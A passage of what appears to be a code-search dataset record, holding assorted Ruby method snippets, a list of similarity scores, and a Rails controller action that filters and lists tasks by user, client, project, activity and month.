"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] |
[
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] |
0.0
|
-1
|
Never trust parameters from the scary internet, only allow the white list through.
|
def profile_params
params.require(:profile).permit(:tipo)
end
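
Two behaviours of this require/permit pattern worth noting, shown as a console-style sketch (plain ActionController::Parameters, no app code assumed): require raises when the top-level key is missing, while permit silently drops every key it was not told about.

params = ActionController::Parameters.new(profile: { tipo: "admin", hacked: true })
params.require(:profile).permit(:tipo).to_h
# => { "tipo" => "admin" }   (:hacked is filtered out)

ActionController::Parameters.new({}).require(:profile)
# raises ActionController::ParameterMissing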
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def valid_params_request?; end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def filtering_params\n params.permit(:email)\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def url_whitelist; end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.69792545",
"0.6781151",
"0.67419964",
"0.674013",
"0.6734356",
"0.6591046",
"0.6502396",
"0.6496313",
"0.6480641",
"0.6477825",
"0.64565",
"0.6438387",
"0.63791263",
"0.63740575",
"0.6364131",
"0.63192815",
"0.62991166",
"0.62978333",
"0.6292148",
"0.6290449",
"0.6290076",
"0.62894756",
"0.6283177",
"0.6242471",
"0.62382483",
"0.6217549",
"0.6214457",
"0.6209053",
"0.6193042",
"0.6177802",
"0.6174604",
"0.61714715",
"0.6161512",
"0.6151757",
"0.6150663",
"0.61461",
"0.61213595",
"0.611406",
"0.6106206",
"0.6105114",
"0.6089039",
"0.6081015",
"0.6071004",
"0.60620916",
"0.6019971",
"0.601788",
"0.6011056",
"0.6010898",
"0.6005122",
"0.6005122",
"0.6001556",
"0.6001049",
"0.59943926",
"0.5992201",
"0.59909594",
"0.5990628",
"0.5980841",
"0.59669393",
"0.59589154",
"0.5958826",
"0.5957911",
"0.5957385",
"0.5953072",
"0.59526145",
"0.5943361",
"0.59386164",
"0.59375334",
"0.59375334",
"0.5933856",
"0.59292704",
"0.59254247",
"0.5924164",
"0.59167904",
"0.59088355",
"0.5907542",
"0.59064597",
"0.5906243",
"0.5898226",
"0.589687",
"0.5896091",
"0.5894501",
"0.5894289",
"0.5891739",
"0.58860534",
"0.5882406",
"0.587974",
"0.58738774",
"0.5869024",
"0.58679986",
"0.5867561",
"0.5865932",
"0.5864461",
"0.58639693",
"0.58617616",
"0.5861436",
"0.5860451",
"0.58602303",
"0.5854586",
"0.58537364",
"0.5850427",
"0.5850199"
] |
0.0
|
-1
|
lists all working users
|
def working
  @users = User.where.not(timer_activity: 0)
end
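
Two notes on this query: where.not(timer_activity: 0) compiles to timer_activity != 0, which in SQL also excludes rows where the column is NULL (which may or may not be intended); and if the condition is reused, it can be pulled into a named scope. A hypothetical refactor, not from the source:

class User < ApplicationRecord
  # Matches users with a non-zero timer_activity; NULL rows are excluded too.
  scope :working, -> { where.not(timer_activity: 0) }
end

# The controller action then reduces to:
def working
  @users = User.working
end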
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_all_users\n\n end",
"def list_users(workspace)\n puts \"\\nUser List\\n\\n\"\n tp workspace.users, \"id\", \"name\", \"real_name\", \"status_text\", \"status_emoji\"\nend",
"def list\n\t\t# retrieve all users\n @users = User.find(:all)\n end",
"def list_users\n tp @users, :real_name, :slack_id, :user_name => {:display_method => :name}\n end",
"def list\n @all_users = User.find(:all)\n end",
"def list_users\n @users = User.find(:all)\n end",
"def list_current_users *args\r\n puts \"not implemented yet\"\r\n end",
"def list\n # ask the user_repository for a list of all the users\n users = @user_repository.all\n # pass that list to the view to display\n @view.list_users(users)\n end",
"def getAllUsers()\n puts \"\\nUSERS:\"\n puts \"-------------------------------------------------\"\n @users.each {|user| puts \"ID: \" + user.id.to_s + \" Name: \" + user.name}\n puts \"-------------------------------------------------\"\n end",
"def view_all_users\n # !! get all user so can interact after viewing them? all_users\n # User.select(:username).each_with_index {|user, index| puts \"#{index+1}. #{user.username}\"}\n #??????\n User.select(:username).each {|user| puts user.username}\n end",
"def list_users\n BrickFTP::API::User.all\n end",
"def list_users\n BrickFTP::API::User.all\n end",
"def list_users\n abort \"You have no users within your config file!\".yellow if config.empty?\n puts \"\\nUser Configuration\"\n config.each do |k, v|\n next if k == 'current_user'\n puts \"\\nEnvironment: #{k}\"\n print_hash_values v\n end\n\n list_current_user if current_user_exists?\n end",
"def list\n get('users')['users']\n end",
"def list\n # ask the repo for a list of all the users\n users = @repo.all\n # pass that list to the view to display\n @view.list_users(users)\n end",
"def list_of_users\n\tusers=[]\n\tfor username in Dir.entries(\"/Users\")\n\t\tif !username.start_with?(\".\")\n\t\t\tusers.push(username)\n\t\tend\n\tend\n\treturn users\nend",
"def users\n gateway_check\n @users\n end",
"def index\n @users = User.find_all_with_authorization(current_user)\n end",
"def index\n @sys_users = Sys::User.all\n end",
"def users\n gateway_check\n unavailable_servers_check\n @users\n end",
"def list_users\n self.class.get('/users')\n end",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def all_users\n `dscl . list /Users`.split(\"\\n\").delete_if { |e| e =~ /^_/ }\n end",
"def index\n @users = User.all\n end",
"def index\n @users = current_user.users\n end",
"def list_users\n http_get(:uri=>\"/users\", :fields=>x_cookie)\n end",
"def index\n \t@all_users = User.all\n end",
"def index\n\t\t# will automatically go into views/users and look for 'index' file to render\n\t\t@all_users = User.all\n\t\t# p @all_users, \"all users\"\n\tend",
"def users\n unless @users\n userListService = $viewContext.getViewService(OTUserListService.java_class)\n @users = userListService.getUserList().sort_by { |user| #sort users by name\n (user.name && !user.name.empty?) ? user.name.downcase.split.values_at(-1, 0) : [''] \n }\n end\n @users\n end",
"def users\n unless @users\n userListService = $viewContext.getViewService(OTUserListService.java_class)\n @users = userListService.getUserList().sort_by { |user| #sort users by name\n (user.name && !user.name.empty?) ? user.name.downcase.split.values_at(-1, 0) : [''] \n }\n end\n @users\n end",
"def get_all\n @user_repository.get_all_users\n end",
"def all_users()\n User.all\n end",
"def index\n \t@users = User.all\n \tend",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def users_list\r\n @users_list = User.order_by_asc('name').find(:all, :conditions => [\"group_id <> ?\", Group.get_guest.id])\r\n if params[:users]\r\n @users_list = User.get_user_list params\r\n end\r\n end",
"def index\n @users = UserService.all_users\n end",
"def index\n \t@users = User.all\n end",
"def new_list_users\n\n end",
"def list_all_members\n @users.each { |x| puts \"-#{x.first}\"}\n end",
"def get_all_user_names\n @user_manager.get_all_user_names\n end",
"def index\n @users = GuestUsers::User.where(host: current_user) || []\n end",
"def html_index\n\t\t@users = User.all\n\tend",
"def index\n @all_users = User.all\n\trender \"list_users\"\n end",
"def user_list\n execute('dscacheutil -q user') do |result|\n users = []\n result.stdout.each_line do |line|\n users << line.split(': ')[1].strip if /^name:/.match?(line)\n end\n\n yield result if block_given?\n\n users\n end\n end",
"def list\n logger.debug \"Processing the list...\"\n @users = User.all.order('updated_at desc') #where(:status=>1)\n end",
"def list(garbage, start)\n @all_user = session_user.agency.users\n @start = start.to_i || 0\n @limit = request.params[\"limit\"] || UserListingLength\n @user = @all_user[@start .. (@start+@limit)-1] # FIXME: Do it with sequel!\n @uparted = @user.partition{|u| @user.index(u) % 2 == 0 }\n end",
"def index\n\t\t# current_user.cdg_id\n\t\t@@users = SoapConnection::ChoferUsers.users( (1 rescue 1) ).compact rescue []\n\t\t@users = @@users\n\tend",
"def index\n\t@users = User.all\nend",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @userls = Userl.all\n end",
"def index\n @users = User.all\n\tend",
"def index\n @list_users = ListUser.all\n end",
"def index\r\n @users = User.all\r\n end",
"def index\r\n @users = User.all\r\n end",
"def index\r\n @users = User.all\r\n end",
"def user_index\n \t\t@users = User.all\n \tend",
"def users\n @users = User.find(:all)\n end",
"def list_user(param = '1110')\n @group_users.each { |item| puts item.info(param) }\n end",
"def user_list\n\t\tget_call = Curl::Easy.http_get(\"#{@ip_address}:#{@port_2}/v2.0/users/\"\n\t\t) do |curl| curl.headers['x-auth-token'] = @token end\n\t\t\n\t\tputs \"Here is a list of users...\"\n\t\tparsed_json = JSON.parse(get_call.body_str)\n\t\t\n\t\tputs parsed_json\n\t\treturn parsed_json\n\tend",
"def user_list\n @user=User.all\n end",
"def users()\n\t\t\t\tusers = UserList.new()\n\n if dscl?\n # The dscl version is still limited\n idlist = `#{DSCLBIN} . -list /Users UniqueID`\n grouplist = `#{DSCLBIN} . -list /Users PrimaryGroupID`\n idlist.each do | line |\n user = UserInfo.new()\n name,id = line.split\n user.username = name\n user.uid = id.to_i\n users[name] = user\n end\n else\n # get the list of users using niutil\n textlist = `niutil -list . /users`\n textlist.each() { |line|\n line.strip!()\n user = UserInfo.new()\n user.username = line[/^[0-9]+\\s+(\\S+)$/, 1]\n userlist = `niutil -read . /users/#{user.username}`\n userlist.each() { |subline|\n subline.strip!()\n case(subline)\n when(/^home:/)\n user.homedir = subline[/:\\s*(.*)$/, 1]\n when(/^uid:/)\n user.uid = subline[/:\\s*(.*)$/, 1].to_i()\n when(/^gid:/)\n user.gid = subline[/:\\s*(.*)$/, 1].to_i()\n when(/^realname:/)\n user.fullname = subline[/:\\s*(.*)$/, 1]\n end\n }\n users[user.username] = user\n }\n end\n\t\t\t\treturn(users)\n\t\t\tend",
"def index\r\n # @users = User.all\r\n end",
"def users_by_name\n if in_admin_mode?\n query = create_query(:User, :all, by: :name)\n show_selected_users(query)\n else\n flash_error(:permission_denied.t)\n redirect_to(action: \"list_rss_logs\")\n end\n end",
"def list_users\n \t#p params[:search]\n \tif params[:search].nil?\n \t\t@users= User.all\n \telse\n \t\t@users= User.search_users(params)#this function from model\n \tend\n end",
"def users\n watches_unique_by_user.map(&:user)\n end",
"def all\n @users = User.all\n end",
"def get_user_list\n return User.find(:all, :order => 'last_name ASC').collect {|user| [user.full_name, user.id]}\n end",
"def index\n @users = User.all\n @user = retrieve_authenticated_user\n end",
"def get_users\n users = call(CMD_GET_USERS)[:users]\n users.map {|account| User.new(account) }\n end",
"def users_list\n\t\t\tpost= { \"token\" => @token }\n\t\t\tdocxml = nil\n\t\t\tdocxml=nessus_request('users/list', post)\n\t\t\tif docxml.nil?\n\t\t\t\treturn\n\t\t\tend\n\t\t\tusers=Array.new\n\t\t\tdocxml.root.elements['contents'].elements['users'].each_element('//user') { |user|\n\t\t\t\tentry=Hash.new\n\t\t\t\tentry['name']=user.elements['name'].text\n\t\t\t\tentry['admin']=user.elements['admin'].text\n\t\t\t\tentry['lastlogin']=user.elements['lastlogin'].text\n\t\t\t\tusers.push(entry)\n\t\t\t}\n\t\t\treturn users\n\t\tend",
"def index\n @users = User.find(:all)\n end",
"def index\n @users = User.find(:all)\n end",
"def index\n @users = User.find(:all)\n end",
"def show_users\n @users = User.all\n end",
"def collect_user_details\n cmd = 'lsuser -a ALL' # get all user names\n result ||= inspec.backend.run_command(cmd)\n return [] if result.exit_status.to_i != 0\n names = result.stdout.split(\"\\n\")\n users_cache = []\n names.sort.uniq.each do |n|\n users_cache << AixUser(inspec, n)\n end\n users_cache\n end",
"def index # Used for list of favorites or followers/followings list\n @users = User.all\n end",
"def index\n\t\t@users = User.all_except(current_user)\n @folders = current_user.folders unless current_user.nil?\n end",
"def show_Users\n theUsers = User.select{ |user| user.group_id == self.id}\n theUsers\n end",
"def list\n flash[:notice] = \"Het volg-systeem is neergestort als een mir. Iedereen volgt gewoon iedereen. Wel zo communistisch en makkelijk\";\n @user = User.find(:all)\n end",
"def users\n users = []\n if current_user.lead?\n users = object.users.select { |u| u.id != current_user.id }\n users = users.unshift(current_user)\n elsif current_user.dev?\n vms_v = object.vms.select { |vm| vm.is_jenkins }\n users = vms_v.flat_map(&:user).uniq.select { |u| u.id != current_user.id }\n users = users.unshift(current_user)\n else\n users <<= current_user\n end\n users.map { |u| u.id }\n end",
"def list\n \t\tuser = User.find(current_user.id)\n \t @computers = user.computer.all\n end",
"def index\n @users = UserService.getAllUserList\n end",
"def list\n @user = User.all(:order => :login) # sort by login name\n end",
"def index\n # specific_assigned_version_process(__callee__, params)\n @twitter_users = current_user.twitter_users.all\n end",
"def getUserList\n @userList\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n if current_user.admin?\n @users = User.all\n end\n \n end"
] |
[
"0.7850157",
"0.7776798",
"0.77706695",
"0.77378845",
"0.7705273",
"0.7644947",
"0.75823116",
"0.75793475",
"0.74473876",
"0.73671395",
"0.7301737",
"0.7301737",
"0.7295739",
"0.72888047",
"0.7276503",
"0.72087264",
"0.7201529",
"0.7194605",
"0.71751314",
"0.71386087",
"0.71257484",
"0.7112666",
"0.7112666",
"0.7112666",
"0.7112666",
"0.7112666",
"0.7112666",
"0.70833004",
"0.7064446",
"0.7048221",
"0.7038468",
"0.7035885",
"0.70222425",
"0.6997478",
"0.6997478",
"0.6977992",
"0.69773316",
"0.69656086",
"0.6955215",
"0.6955215",
"0.6955215",
"0.6952418",
"0.69376045",
"0.6929588",
"0.692777",
"0.691575",
"0.69027317",
"0.6891901",
"0.68902725",
"0.6863942",
"0.6855453",
"0.6852362",
"0.68385446",
"0.6837515",
"0.6833941",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.6824254",
"0.6821663",
"0.6818924",
"0.6815303",
"0.6815303",
"0.6815303",
"0.6813871",
"0.6812699",
"0.6812416",
"0.68116945",
"0.67998236",
"0.67967266",
"0.6793293",
"0.6792308",
"0.67892104",
"0.6782947",
"0.6778194",
"0.67778915",
"0.67752606",
"0.67731106",
"0.6772549",
"0.6762167",
"0.6762167",
"0.6762167",
"0.67596006",
"0.67581534",
"0.67550486",
"0.67483324",
"0.67414534",
"0.6738629",
"0.6737248",
"0.67361546",
"0.6731157",
"0.672568",
"0.6725045",
"0.6723011",
"0.6722549",
"0.6722549",
"0.67107284"
] |
0.0
|
-1
|
main list tasks action
|
def list_tasks
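  # Builds @tasks by intersecting the results of each non-empty search
  # filter (user, client, project, activity, date). Falls back to the 20
  # most recent tasks when no search was submitted or every field is blank.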
  @params = search_params[:search]
  if @params
    # Each non-empty filter yields a set of tasks; successive filters are
    # intersected (&) so a task must match every criterion given.
    if !@params[:user].empty?
      query = iterate_add_tasks(User.where('handle LIKE ?', "%#{@params[:user]}%"))
      @tasks = @tasks.nil? ? query : @tasks & query if query
    end
    if !@params[:client].empty?
      query = iterate_add_tasks(Client.where('name LIKE ?', "%#{@params[:client]}%"))
      @tasks = @tasks.nil? ? query : @tasks & query if query
    end
    if !@params[:project].empty?
      query = iterate_add_tasks(Project.where('name LIKE ?', "%#{@params[:project]}%"))
      @tasks = @tasks.nil? ? query : @tasks & query if query
    end
    if !@params[:activity].empty?
      query = iterate_add_tasks(Activity.where('name LIKE ?', "%#{@params[:activity]}%"))
      @tasks = @tasks.nil? ? query : @tasks & query if query
    end
    if !@params[:date].empty?
      # A date filter matches the whole month containing the given date.
      @start = Date.parse(@params[:date]).beginning_of_month
      @end = Date.parse(@params[:date]).end_of_month
      query = Task.where(date: @start..@end)
      @tasks = @tasks.nil? ? query : @tasks & query if query
    end
    # Newest tasks first.
    @tasks = @tasks.uniq.sort_by { |t| t[:date] }.reverse if @tasks
    flash[:notice] = nil
    # If every filter was left blank, fall back to the default listing.
    all = true
    @params.each do |p|
      all = false unless p[1].empty?
    end
    if all
      @tasks = Task.includes(:user, :client, :project, :activity).order(:date).reverse_order.limit(20)
      flash[:notice] = 'Listing the latest 20 tasks'
    end
  else
    @tasks = Task.includes(:user, :client, :project, :activity).order(:date).reverse_order.limit(20)
